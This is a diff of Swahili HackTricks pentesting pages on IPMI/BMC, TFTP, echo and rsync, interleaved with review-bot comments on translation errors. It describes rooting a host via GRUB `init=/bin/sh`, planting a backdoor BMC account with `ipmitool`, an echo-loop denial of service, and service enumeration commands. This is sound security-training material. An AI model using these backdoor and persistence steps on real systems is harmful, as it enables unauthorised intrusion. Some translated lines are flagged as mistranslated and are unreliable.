Upatikanaji wa kiutawala kwa Msimamizi wa Bodi ya Msingi (BMC) unafungua njia mbalimbali za kufikia mfumo wa uendeshaji wa mwenyeji. Njia rahisi ni kutumia kazi ya Kivinjari, Video, Panya (KVM) ya BMC. Hii inaweza kufanywa kwa kuanzisha upya mwenyeji hadi kwenye shell ya root kupitia GRUB (ukitumia `init=/bin/sh`) au kuanzisha kutoka kwa CD-ROM ya virtual iliyowekwa kama diski ya kuokoa. Njia hizi zinaruhusu kudhibiti moja kwa moja diski ya mwenyeji, ikiwa ni pamoja na kuingiza backdoors, kutoa data, au hatua zozote zinazohitajika kwa tathmini ya usalama. Hata hivyo, hii inahitaji kuanzisha upya mwenyeji, ambayo ni hasara kubwa. Bila kuanzisha upya, kufikia mwenyeji anayekimbia ni ngumu zaidi na inategemea usanidi wa mwenyeji. Ikiwa console ya kimwili au serial ya mwenyeji inaendelea kuingia, inaweza kuchukuliwa kwa urahisi kupitia kazi za KVM za BMC au serial-over-LAN (sol) kupitia `ipmitool`. Kuchunguza matumizi ya rasilimali za vifaa vilivyoshirikiwa, kama vile basi ya i2c na chip ya Super I/O, ni eneo linalohitaji uchunguzi zaidi.
## Kuweka Mlango Nyuma kwenye BMC kutoka kwa Mwenyeji
## Introducing Backdoors into BMC from the Host
Baada ya kudukua mwenyeji ulio na BMC, **kiolesura cha BMC cha ndani kinaweza kutumika kuweka mlango nyuma**, kuunda uwepo wa kudumu kwenye seva. Shambulio hili linahitaji uwepo wa **`ipmitool`** kwenye mwenyeji uliodukuliwa na kuwezeshwa kwa msaada wa dereva wa BMC. Amri zifuatazo zinaonyesha jinsi akaunti mpya ya mtumiaji inavyoweza kuingizwa kwenye BMC kwa kutumia kiolesura cha ndani cha mwenyeji, ambacho kinapuuza haja ya uwakilishi. Mbinu hii inatumika kwa anuwai ya mifumo ya uendeshaji ikiwa ni pamoja na Linux, Windows, BSD, na hata DOS.
Baada ya kuathiri mwenyeji aliye na BMC, **kiolesura cha BMC cha ndani kinaweza kutumika kuingiza akaunti ya mtumiaji ya backdoor**, kuunda uwepo wa kudumu kwenye seva. Shambulio hili linahitaji uwepo wa **`ipmitool`** kwenye mwenyeji aliyeathiriwa na kuanzishwa kwa msaada wa dereva wa BMC. Amri zifuatazo zinaonyesha jinsi akaunti mpya ya mtumiaji inaweza kuingizwa kwenye BMC kwa kutumia kiolesura cha ndani cha mwenyeji, ambacho kinapita hitaji la uthibitisho. Mbinu hii inatumika kwa mifumo mbalimbali ya uendeshaji ikiwa ni pamoja na Linux, Windows, BSD, na hata DOS.
```bash
ipmitool user list
ID Name Callin Link Auth IPMI Msg Channel Priv Limit
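Review bot: several new lines in this hunk translate a term into a word with an unrelated or opposite meaning, which a reader of the Swahili page cannot recover from. `### **Supermicro IPMI UPnP Uthibitisho wa Usalama**` (and "Uthibitisho katika Intel SDK" below it) renders "vulnerability" as "uthibitisho", i.e. verification or confirmation; "Ushirikiano huu unaruhusu upatikanaji wa nywila za hash" renders "this vulnerability" as "ushirikiano", collaboration; "Keyboard, Video, Mouse (KVM)" becomes "Kivinjari, Video, Panya" (kivinjari is a browser; keyboard is kibodi); Fujitsu's "Integrated Remote Management Controller" becomes "Meneja wa Usimamizi wa Kijijini" (kijijini means rural; remote is "wa mbali"); "static default credentials" becomes "akili za default zisizobadilika" (akili is intellect; the old line's "vitambulisho" was correct); and `**HP inabadilisha nenosiri la default**` drops the randomisation that the old line ("inarandarandisha") and the following bullet about an 8-character factory-randomized string both depend on, so "HP huweka nenosiri la nasibu" or the untranslated "randomizes" would be better. Separately, the headings `## Basic Information`, "Overview of IPMI", "Enumeration", "Discovery", "IPMI Vulnerabilities", "Accessing the Host via BMC" and "Introducing Backdoors into BMC from the Host" revert to English although the old lines were already Swahili and the paragraphs under them remain Swahili; restore the translated headings. Also worth fixing while here, although it is unchanged context: `nmap -n-sU -p 623 10.0.0./24` is missing the space between `-n` and `-sU`, and the target `10.0.0./24` on both nmap lines is not a valid network and should name a complete one (for example 10.0.0.0/24).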
@ -126,20 +127,21 @@ ID Name Callin Link Auth IPMI Msg Channel Priv Limit
* `port:623`
## Marejeo
## References
* [https://blog.rapid7.com/2013/07/02/a-penetration-testers-guide-to-ipmi/](https://blog.rapid7.com/2013/07/02/a-penetration-testers-guide-to-ipmi/)
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **fuata** sisi kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}
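Review bot: the added support block is inconsistent in language, both within itself and against the other files in this commit. The new lines `Jifunze na fanya mazoezi ya AWS Hacking:` and `* Angalia [**mpango wa usajili**]` are Swahili, while the new `<summary>Support HackTricks</summary>` inside the same `<details>` is English, and the same block elsewhere in this commit is entirely English (`* Check the [**subscription plans**]`). Since this footer is a shared template, settle on one version and apply it to every page; otherwise each copy will have to be re-translated on the next template update.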


@ -1,42 +1,43 @@
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
# Taarifa Msingi
# Basic Information
**Itifaki ya Uhamishaji wa Faili wa Trivial (TFTP)** ni itifaki rahisi inayotumika kwenye **bandari ya UDP 69** ambayo inaruhusu uhamisho wa faili bila kuhitaji uwakilishi. Iliyotajwa katika **RFC 1350**, unyenyekevu wake una maana haina vipengele muhimu vya usalama, ikisababisha matumizi madogo kwenye Mtandao wa Umma. Walakini, **TFTP** inatumiwa sana ndani ya mitandao mikubwa ya ndani kwa kusambaza **faili za usanidi** na **picha za ROM** kwa vifaa kama **simu za VoIP**, shukrani kwa ufanisi wake katika hali hizi maalum.
**Trivial File Transfer Protocol (TFTP)** ni protokali rahisi inayotumika kwenye **UDP port 69** inayoruhusu uhamishaji wa faili bila kuhitaji uthibitisho. Imeangaziwa katika **RFC 1350**, urahisi wake unamaanisha haina vipengele muhimu vya usalama, na kusababisha matumizi yake kuwa madogo kwenye mtandao wa umma. Hata hivyo, **TFTP** inatumika sana ndani ya mitandao mikubwa ya ndani kwa kusambaza **faili za usanidi** na **picha za ROM** kwa vifaa kama **VoIP handsets**, kutokana na ufanisi wake katika hali hizi maalum.
**TODO**: Toa habari kuhusu ni nini Bittorrent-tracker (Shodan inatambua bandari hii kwa jina hilo). Ikiwa una habari zaidi kuhusu hili tujulishe kwa mfano kwenye [**kikundi cha telegram cha HackTricks**](https://t.me/peass) (au kwenye suala la github katika [PEASS](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite)).
**TODO**: Toa taarifa kuhusu nini ni Bittorrent-tracker (Shodan inatambua bandari hii kwa jina hilo). Ikiwa una maelezo zaidi kuhusu hili tujulishe kwa mfano katika [**HackTricks telegram group**](https://t.me/peass) (au katika suala la github katika [PEASS](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite)).
**Bandari ya Default:** 69/UDP
**Default Port:** 69/UDP
```
PORT STATE SERVICE REASON
69/udp open tftp script-set
```
# Uchambuzi
# Enumeration
TFTP haitoi orodha ya saraka kwa hivyo script `tftp-enum` kutoka `nmap` itajaribu kuvunja nguvu njia za msingi.
TFTP haitoi orodha ya saraka hivyo skripti `tftp-enum` kutoka `nmap` itajaribu kulazimisha njia za kawaida.
```bash
nmap -n -Pn -sU -p69 -sV --script tftp-enum <IP>
```
## Pakua/Pakia
## Download/Upload
Unaweza kutumia Metasploit au Python kuangalia kama unaweza kupakua/pakia faili:
Unaweza kutumia Metasploit au Python kuangalia kama unaweza kupakua/kupakia faili:
```bash
msf5> auxiliary/admin/tftp/tftp_transfer_util
```
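Review bot: the headings in this hunk are moved back from Swahili to English (`# Taarifa Msingi` becomes `# Basic Information`, `# Uchambuzi` becomes `# Enumeration`, `## Pakua/Pakia` becomes `## Download/Upload`, `**Bandari ya Default:**` becomes `**Default Port:**`) while the paragraphs under them stay Swahili. If this is deliberate, to keep the GitBook anchor IDs identical to the English edition, say so in the commit message; if not, translate the headings like the body. Separately, `kulazimisha njia za kawaida` loses the technical sense of brute-forcing; keeping the English term, as the rsync page does with `### [**Brute Force**]`, reads more clearly.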
@ -57,16 +58,17 @@ client.upload("filename to upload", "/local/path/file", timeout=5)
{% embed url="https://websec.nl/" %}
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}


@ -1,18 +1,19 @@
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
**Kikundi cha Usalama cha Try Hard**
**Try Hard Security Group**
<figure><img src="/.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>
@ -21,13 +22,13 @@ Njia nyingine za kusaidia HackTricks:
***
# Taarifa Msingi
# Basic Information
Kuna huduma ya kielekezi inayofanya kazi kwenye mwenyeji huyu. Huduma ya kielekezi ilikusudiwa kwa ajili ya majaribio na kupima na inaweza kusikiliza kwenye itifaki za TCP na UDP. Mfumo hutoa nyuma data yoyote inayopokea, bila kuihariri.\
**Inawezekana kusababisha kukataliwa kwa huduma kwa kuunganisha huduma ya kielekezi kwenye huduma ya kielekezi kwenye mashine hiyo hiyo au nyingine**. Kwa sababu ya idadi kubwa sana ya pakiti zinazozalishwa, mashine zilizoathiriwa zinaweza kuondolewa kwa ufanisi kutoka kwenye huduma.\
Maelezo kutoka [https://www.acunetix.com/vulnerabilities/web/echo-service-running/](https://www.acunetix.com/vulnerabilities/web/echo-service-running/)
Huduma ya echo inafanya kazi kwenye mwenyeji huu. Huduma ya echo ilikusudiwa kwa ajili ya majaribio na vipimo na inaweza kusikiliza kwenye itifaki za TCP na UDP. Server inarudisha data yoyote inayopokea, bila mabadiliko.\
**Inawezekana kusababisha kukatizwa kwa huduma kwa kuunganisha huduma ya echo kwenye huduma ya echo kwenye mashine moja au nyingine**. Kwa sababu ya idadi kubwa sana ya pakiti zinazozalishwa, mashine zilizoathirika zinaweza kutolewa kwa ufanisi kutoka kwenye huduma.\
Taarifa kutoka [https://www.acunetix.com/vulnerabilities/web/echo-service-running/](https://www.acunetix.com/vulnerabilities/web/echo-service-running/)
**Bandari ya Default:** 7/tcp/udp
**Default Port:** 7/tcp/udp
```
PORT STATE SERVICE
7/udp open echo
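Review bot: the new sentence `Server inarudisha data yoyote inayopokea` drops an English noun into the Swahili text where the removed line used `Mfumo`; the loanword `seva`, which this same commit uses on the rsync page (`seva ya rsync`), would keep the page in one language. In the same hunk `kukatizwa kwa huduma` is used for denial of service while the reference title a few lines below keeps `Denial-of-Service`; consider adding the English term in parentheses the first time it appears so readers can match it to the CERT advisory.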
@ -43,29 +44,30 @@ Hello echo #This is the response
* `port:7 echo`
## Marejeo
## References
[Wikipedia echo](http://en.wikipedia.org/wiki/ECHO\_protocol)
[CA-1996-01 UDP Port Denial-of-Service Attack](http://www.cert.org/advisories/CA-1996-01.html)
**Kikundi cha Usalama cha Try Hard**
**Try Hard Security Group**
<figure><img src="/.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>
{% embed url="https://discord.gg/tryhardsecurity" %}
{% hint style="success" %}
Jifunze & fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze & fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **fuata** sisi kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}


@ -1,55 +1,34 @@
# 873 - Pentesting Rsync
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## **Maelezo Muhimu**
## **Basic Information**
Kutoka [wikipedia](https://en.wikipedia.org/wiki/Rsync):
From [wikipedia](https://en.wikipedia.org/wiki/Rsync):
> **rsync** ni programu inayotumika kwa ufanisi katika [kuhamisha](https://en.wikipedia.org/wiki/File\_transfer) na [kusawazisha](https://en.wikipedia.org/wiki/File\_synchronization) [faili](https://en.wikipedia.org/wiki/Computer\_file) kati ya kompyuta na diski ngumu ya nje na kati ya [kompyuta](https://en.wikipedia.org/wiki/Computer) zilizounganishwa kwenye [mtandao](https://en.wikipedia.org/wiki/Computer\_network) kwa kulinganisha nyakati za [ubadilishaji](https://en.wikipedia.org/wiki/Timestamping\_\(computing\)) na ukubwa wa faili.[\[3\]](https://en.wikipedia.org/wiki/Rsync#cite\_note-man\_page-3) Mara nyingi hupatikana kwenye [mfumo wa uendeshaji](https://en.wikipedia.org/wiki/Operating\_system) kama vile Unix. Algorithm ya rsync ni aina ya [delta encoding](https://en.wikipedia.org/wiki/Delta\_encoding), na hutumiwa kupunguza matumizi ya mtandao. [Zlib](https://en.wikipedia.org/wiki/Zlib) inaweza kutumika kwa [kupunguza data](https://en.wikipedia.org/wiki/Data\_compression) ziada,[\[3\]](https://en.wikipedia.org/wiki/Rsync#cite\_note-man\_page-3) na [SSH](https://en.wikipedia.org/wiki/Secure\_Shell) au [stunnel](https://en.wikipedia.org/wiki/Stunnel) inaweza kutumika kwa usalama.
> **rsync** ni chombo cha kuhamasisha [kuhamasisha](https://en.wikipedia.org/wiki/File\_transfer) na [kuunganisha](https://en.wikipedia.org/wiki/File\_synchronization) [faili](https://en.wikipedia.org/wiki/Computer\_file) kati ya kompyuta na diski ngumu ya nje na kati ya [kompyuta](https://en.wikipedia.org/wiki/Computer) zilizounganishwa [mtandao](https://en.wikipedia.org/wiki/Computer\_network) kwa kulinganisha [nyakati za mabadiliko](https://en.wikipedia.org/wiki/Timestamping\_\(computing\)) na ukubwa wa faili.[\[3\]](https://en.wikipedia.org/wiki/Rsync#cite\_note-man\_page-3) Inapatikana mara nyingi kwenye [sistimu za uendeshaji](https://en.wikipedia.org/wiki/Operating\_system) zinazofanana na [Unix](https://en.wikipedia.org/wiki/Unix-like). Algorithimu ya rsync ni aina ya [delta encoding](https://en.wikipedia.org/wiki/Delta\_encoding), na inatumika kupunguza matumizi ya mtandao. [Zlib](https://en.wikipedia.org/wiki/Zlib) inaweza kutumika kwa [kuongeza](https://en.wikipedia.org/wiki/Data\_compression) [kushinikiza data](https://en.wikipedia.org/wiki/Data\_compression),[\[3\]](https://en.wikipedia.org/wiki/Rsync#cite\_note-man\_page-3) na [SSH](https://en.wikipedia.org/wiki/Secure\_Shell) au [stunnel](https://en.wikipedia.org/wiki/Stunnel) zinaweza kutumika kwa usalama.
**Bandari ya chaguo-msingi:** 873
**Default port:** 873
```
PORT STATE SERVICE REASON
873/tcp open rsync syn-ack
```
### Uchambuzi
## Enumeration
### Bango na Mawasiliano ya Mwongozo
Kabla ya kuanza kuchunguza huduma ya rsync, ni muhimu kufanya uchambuzi wa awali ili kupata habari muhimu. Kuna njia mbili za kufanya hivyo: kuchunguza bango na kuwasiliana kwa mwongozo.
#### Kuchunguza Bango
Kuchunguza bango kunahusisha kupata habari kutoka kwa bango la huduma ya rsync. Unaweza kutumia amri ya `telnet` au zana kama `nmap` kufanya hivyo. Kwa mfano, unaweza kutumia amri ifuatayo:
```plaintext
telnet <IP> 873
```
Ikiwa unapata majibu kutoka kwa seva ya rsync, unaweza kusoma habari muhimu kama toleo la huduma na maelezo mengine yanayoweza kuwa na manufaa.
#### Kuwasiliana kwa Mwongozo
Kuwasiliana kwa mwongozo kunahusisha kujaribu kuunganisha na seva ya rsync kwa kutumia amri ya `rsync` na kuchunguza majibu yake. Unaweza kutumia amri ifuatayo:
```plaintext
rsync rsync://<IP>:873
```
Ikiwa unapata majibu kutoka kwa seva ya rsync, unaweza kusoma habari muhimu kama toleo la huduma na maelezo mengine yanayoweza kuwa na manufaa.
### Banner & Mawasiliano ya Kiganja
```bash
nc -vn 127.0.0.1 873
(UNKNOWN) [127.0.0.1] 873 (rsync) open
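Review bot: the rewritten Wikipedia quote contains a duplicated word and a duplicated link: `chombo cha kuhamasisha [kuhamasisha](.../File_transfer)` repeats the verb, and `kuhamasisha` means to motivate; the verb for transferring files is `kuhamisha`. Right after it, `[kuongeza](.../Data_compression) [kushinikiza data](.../Data_compression)` links the same article twice for one phrase; one link is enough. Also, the new heading `### Banner & Mawasiliano ya Kiganja` renders "manual" as `kiganja` (palm of the hand); the removed heading's `Mwongozo`, or `kwa Mikono`, is closer to the intended "by hand" meaning.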
@ -71,9 +50,9 @@ nc -vn 127.0.0.1 873
raidroot
@RSYNCD: AUTHREQD 7H6CqsHCPG06kRiFkKwD8g <--- This means you need the password
```
### **Kutambaza Folda Zilizoshirikiwa**
### **Kuhesabu Folda Zinazoshirikiwa**
**Moduli za Rsync** hutambuliwa kama **kushiriki folda** ambazo zinaweza kuwa **zimekingwa na nywila**. Ili kutambua moduli zilizopo na kuangalia kama zinahitaji nywila, tumia amri zifuatazo:
**Moduli za Rsync** zinatambulika kama **ushirikiano wa directory** ambao unaweza kuwa **na nywila**. Ili kubaini moduli zinazopatikana na kuangalia kama zinahitaji nywila, amri zifuatazo zinatumika:
```bash
nmap -sV --script "rsync-list-modules" -p <PORT> <IP>
msf> use auxiliary/scanner/rsync/modules_list
